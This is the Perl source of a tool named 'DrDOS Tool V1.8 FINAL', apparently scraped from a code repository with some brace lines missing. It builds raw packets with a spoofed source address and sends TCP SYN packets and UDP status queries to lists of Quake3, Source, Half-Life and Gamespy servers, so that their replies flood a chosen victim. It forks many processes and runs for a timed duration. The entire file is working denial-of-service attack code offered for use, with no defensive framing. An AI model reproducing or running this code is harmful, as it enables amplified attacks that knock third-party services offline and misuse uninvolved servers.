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synced 2025-02-14 10:51:58 +00:00
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219 lines
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#!/usr/bin/perl -w
use Benchmark;
use Net::RawIP;
use Time::HiRes qw ( usleep );
my $rand = int( rand 0x400 );
my $frag = 0;
my $doff = 0x05;
my $ttl = 0xFF;
my $tos = 0x08;
my $pid;
my $tx;
my @list;
my @running;
my @pids;
my %attack =
( "tcp" => \&tcp, "quake3" => \&quake3, "source" => \&source, "hl" => \&hl, "gs" => \&gs, "gs2" => \&gs2 );
if ( @ARGV < 7 || @ARGV > 7 ) {
$tx = $ARGV[3];
my $t0 = new Benchmark;
print "\n*** Now Reading Hosts Into Array\n\n";
open( ELITE, $ARGV[2] ) || die "Unable to open $ARGV[2]!\n";
chomp( @list = <ELITE> );
sub tcp {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl },
tcp => {
dest => $port,
source => $ARGV[1],
syn => 1,
ack => 0,
fin => 0,
rst => 0,
psh => 0,
urg => 0,
doff => $doff
$a->send( 0, $tx );
sub quake3 {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => {
dest => $port,
source => $ARGV[1],
data => chr(255) . chr(255) . chr(255) . chr(255) . "getstatus" . chr(10),
$a->send( 0, $tx );
sub source {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . chr(85), }
$a->send( 0, $tx );
sub hl {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . "rules", }
$a->send( 0, $tx );
sub gs {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => {
dest => $port,
source => $ARGV[1],
data => chr(92) . chr(115) . chr(116) . chr(97) . chr(116) . chr(117) . chr(115) . chr(92),
$a->send( 0, $tx );
sub gs2 {
my ( $ip, $port ) = @_;
my $a = new Net::RawIP(
ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
udp => {
dest => $port,
source => $ARGV[1],
data => chr(254)
. chr(253)
. chr(0)
. chr(67)
. chr(79)
. chr(82)
. chr(89)
. chr(255)
. chr(255)
. chr(255),
$a->send( 0, $tx );
sub paxor {
my $type = $_[0];
unless ( $type eq "mixed" ) {
while (1) {
foreach (@list) { $attack{$type}->( split( ':', $_ ) );}
else {
my @part;
while (1) {
foreach (@list) {
@part = split( ":", $_ );
$attack{ $part[2] }->( $part[0], $part[1]);
for($number = 0;$number < $ARGV[5];$number++)
$pid = fork();
if ( $pid == 0 ) {
$SIG{INT} = \&controlsub;
&paxor( $ARGV[4] );
my $t1 = new Benchmark;
my $td = timediff( $t1, $t0 );
print "\nTotal Time: ", timestr($td), "\n";
else {
push(@pids, $pid);
sleep( $ARGV[6] );
kill( "INT", $_ );
sub controlme {
$SIG{INT} = \&controlme;
print "Signal Caught Now Exiting\n";
my $t1 = new Benchmark;
my $td = timediff( $t1, $t0 );
print "\nTotal Time: ", timestr($td), "\n";
sub controlsub {
$SIG{INT} = \&controlsub;
sub usage {
print << "HEREDOC";
$0 <target> <target port> <reflector list> <weight> <attack type> <threads> <Time>
DrDOS Tool V1.8 FINAL by ohnoes1479
Time: Limit running time of the script, Time is in seconds
threads: number of threads to run
attack types:
tcp: reflected tcp SYN attack
quake3: reflected udp attack using quake3 based servers
source: reflected udp attack using Valve Source based servers
hl: reflected udp attack using Half Life servers
gs: reflected udp attack using Gamespy based servers
gs2: reflected udp attack using Gamespy 2 based servers
mixed: specify type of server in list, EG:
Command: $0 8080 servers.txt 5 tcp
} |